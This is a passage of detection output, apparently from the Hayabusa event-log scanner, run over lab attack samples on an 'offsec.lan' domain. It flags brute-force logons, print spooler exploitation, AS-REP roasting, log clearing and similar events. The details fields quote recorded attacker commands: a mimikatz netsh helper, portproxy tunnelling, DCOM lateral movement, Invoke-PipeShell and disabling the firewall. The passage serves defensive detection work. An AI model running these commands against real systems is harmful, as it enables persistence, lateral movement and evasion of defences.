Files\OpenSSH-Win64\sshd.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx 2021-05-22 05:43:22.562 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx 2021-05-22 05:43:49.345 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx 2021-05-22 05:43:50.131 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx 2021-05-22 05:43:50.607 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx 2021-05-22 05:43:50.866 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx 2021-05-23 06:56:57.685 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx 2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh add helper mimikatz.exe | Path: C:\Windows\System32\netsh.exe | PID: 0xd28 | User: admmig | LID: 0x75494,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx 2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx 2021-05-26 22:02:27.149 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x312517c1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx 2021-05-26 22:02:27.149 +09:00,mssql01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx 2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,critical,Exec,CVE-2021-1675 Print Spooler Exploitation IPC Access,,../hayabusa-rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx 2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx 2021-05-26 22:02:29.726 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x31251a6a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx 2021-05-26 22:02:29.726 +09:00,mssql01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx 2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx 2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,critical,Exec,CVE-2021-1675 Print Spooler Exploitation IPC Access,,../hayabusa-rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx 2021-05-26 22:02:34.373 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251ce4,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx 2021-05-26 22:02:34.375 +09:00,mssql01.offsec.lan,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx 2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251d11,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx 2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251d23,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx 2021-05-26 22:02:34.380 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251d36,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx 2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,medium,CredAccess,Possible AS-REP Roasting,Possible AS-REP Roasting,../hayabusa-rules/hayabusa/default/alerts/Security/4768_KerberosTGT-Request_AS-REP-Roasting.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx 2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admin-test | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0 | PreAuthType: 0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx 2021-05-28 04:30:47.965 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4103,4104-DCOMexec native via PowerShell.evtx" 2021-05-28 04:30:47.966 +09:00,jump01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID(""MMC20.Application.1"",""fs01""))",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4103,4104-DCOMexec native via PowerShell.evtx" 2021-05-28 04:30:47.966 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,"$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID(""MMC20.Application.1"",""fs01""))",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4103,4104-DCOMexec native via PowerShell.evtx" 2021-05-28 04:30:48.169 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4103,4104-DCOMexec native via PowerShell.evtx" 2021-05-28 04:30:48.170 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4103,4104-DCOMexec native via PowerShell.evtx" 2021-05-28 04:30:48.172 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4103,4104-DCOMexec native via PowerShell.evtx" 2021-06-01 23:06:34.542 +09:00,fs01.offsec.lan,4720,low,Persis,Local User Account Created,User: WADGUtilityAccount | SID: S-1-5-21-1081258321-37805170-3511562335-1000,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx" 2021-06-01 23:08:21.225 +09:00,fs01.offsec.lan,4720,low,Persis,Local User Account Created,User: elie | SID: S-1-5-21-1081258321-37805170-3511562335-1001,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx" 2021-06-01 23:09:38.437 +09:00,fs01.offsec.lan,4698,info,,Task Created,"Name: \Microsoft\SynchronizeTimeZone | Content: 2021-06-01T16:09:38.3707854 OFFSEC\admmig \Microsoft\SynchronizeTimeZone 2021-06-01T16:09:35.8747701 true 1 LeastPrivilege OFFSEC\admmig InteractiveToken IgnoreNew true true true false false PT10M PT1H true false true true false false false P3D 7 adf | User: admmig | LID: 0x46b7b4",../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx" 2021-06-03 21:17:56.988 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx 2021-06-03 21:17:58.582 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh I p a v l=8001 listena=0.0.0.0 connectp=3389 c=1.1.1.1 | Path: C:\Windows\System32\netsh.exe | PID: 0x578 | User: admmig | LID: 0x46b7b4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx 2021-06-03 21:18:04.312 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=48333 connectaddress=127.0.0.1 connectport=80 | Path: C:\Windows\System32\netsh.exe | PID: 0x1048 | User: admmig | LID: 0x46b7b4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx 2021-06-03 21:18:06.940 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh interface portproxy reset | Path: C:\Windows\System32\netsh.exe | PID: 0x46c | User: admmig | LID: 0x46b7b4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx 2021-06-03 21:18:12.941 +09:00,fs01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x322e5b7,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx 2021-06-03 21:18:12.942 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x322e5b7,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx 2021-06-03 22:05:20.242 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx 2021-06-03 22:05:40.097 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx 2021-06-03 22:05:40.098 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx 2021-06-03 22:05:59.812 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx 2021-06-03 22:06:06.124 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx 2021-06-03 22:06:06.125 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,Invoke-PipeShell -mode client -server localhost -aeskey aaaabbbbccccdddd -pipe eventlog_svc -i -timeout 1000,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx 2021-06-03 22:06:06.151 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.IO.Pipes.NamedPipeClientStream"" ParameterBinding(New-Object): name=""ArgumentList""; value=""localhost, eventlog_svc, InOut, None, Impersonation""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx 2021-06-03 22:06:06.161 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,"] Waiting for client..`n"" $PipeObject.WaitForConnection() } else { try { # Add a 1s time-out in case the server is not live $PipeObject.Connect($timeout) } catch { echo ""[!] Server pipe not available!"" Return } } $PipeReader = $PipeWriter = $null $PipeReader = new-object System.IO.StreamReader($PipeObject) $PipeWriter = new-object System.IO.StreamWriter($PipeObject) $PipeWriter.AutoFlush = $true Initialize-Session }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx 2021-06-03 22:06:07.154 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Output): ""Write-Output"" ParameterBinding(Write-Output): name=""InputObject""; value=""[!] Server pipe not available!""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx 2021-06-03 22:06:07.154 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""+----------------------------------- | Host Name : JUMP01 | Named Pipe : eventlog_svc | AES Key : aaaabbbbccccdddd | Timeout : 1000 +-----------------------------------"" ParameterBinding(Out-Default): name=""InputObject""; value=""[!] Server pipe not available!""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx 2021-06-03 22:06:07.156 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx 2021-06-03 22:06:07.157 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx 2021-06-03 22:06:27.069 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx 2021-06-03 22:06:27.070 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,Invoke-PipeShell -mode client -server localhost -aeskey aaaabbbbccccdddd -pipe eventlog_svc -timeout 1000 -c ls,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx 2021-06-03 22:06:27.073 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.IO.Pipes.NamedPipeClientStream"" ParameterBinding(New-Object): name=""ArgumentList""; value=""localhost, eventlog_svc, InOut, None, Impersonation""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx 2021-06-03 22:06:28.071 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Output): ""Write-Output"" ParameterBinding(Write-Output): name=""InputObject""; value=""[!] Server pipe not available!""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx 2021-06-03 22:06:28.072 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""+----------------------------------- | Host Name : JUMP01 | Named Pipe : eventlog_svc | AES Key : aaaabbbbccccdddd | Timeout : 1000 +-----------------------------------"" ParameterBinding(Out-Default): name=""InputObject""; value=""[!] Server pipe not available!""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx 2021-06-04 02:42:33.379 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Resolve-Path): ""Resolve-Path"" ParameterBinding(Resolve-Path): name=""ErrorAction""; value=""Ignore"" ParameterBinding(Resolve-Path): name=""WarningAction""; value=""Ignore"" ParameterBinding(Resolve-Path): name=""InformationAction""; value=""Ignore"" ParameterBinding(Resolve-Path): name=""Verbose""; value=""False"" ParameterBinding(Resolve-Path): name=""Debug""; value=""False"" ParameterBinding(Resolve-Path): name=""Path""; value=""Net*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID800-4103-4104-Print spooler privilege escalation (CVE-2020-1048).evtx 2021-06-04 02:42:35.914 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID800-4103-4104-Print spooler privilege escalation (CVE-2020-1048).evtx 2021-06-04 02:42:35.915 +09:00,fs01.offsec.lan,4104,info,,PwSh Scriptblock Log,Add-PrinterPort -Name .\NetshHelperBeacon.dll,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID800-4103-4104-Print spooler privilege escalation (CVE-2020-1048).evtx 2021-06-04 02:42:35.939 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Add-PrinterPort): ""Add-PrinterPort"" ParameterBinding(Add-PrinterPort): name=""Name""; value="".\NetshHelperBeacon.dll"" ParameterBinding(Add-PrinterPort): name=""ComputerName""; value="""" ParameterBinding(Add-PrinterPort): name=""HostName""; value="""" ParameterBinding(Add-PrinterPort): name=""PrinterName""; value="""" ParameterBinding(Add-PrinterPort): name=""PrinterHostAddress""; value="""" ParameterBinding(Add-PrinterPort): name=""PortNumber""; value=""0"" ParameterBinding(Add-PrinterPort): name=""SNMP""; value=""0"" ParameterBinding(Add-PrinterPort): name=""SNMPCommunity""; value="""" ParameterBinding(Add-PrinterPort): name=""LprHostAddress""; value="""" ParameterBinding(Add-PrinterPort): name=""LprQueueName""; value="""" ParameterBinding(Add-PrinterPort): name=""LprByteCounting""; value=""False"" ParameterBinding(Add-PrinterPort): name=""ThrottleLimit""; value=""0"" ParameterBinding(Add-PrinterPort): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID800-4103-4104-Print spooler privilege escalation (CVE-2020-1048).evtx 2021-06-04 02:42:35.939 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID800-4103-4104-Print spooler privilege escalation (CVE-2020-1048).evtx 2021-06-04 03:34:12.671 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx 2021-06-04 03:34:12.672 +09:00,fs01.offsec.lan,4104,info,,PwSh Scriptblock Log,"Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx 2021-06-04 03:34:12.672 +09:00,fs01.offsec.lan,4104,high,Evas,Windows Firewall Profile 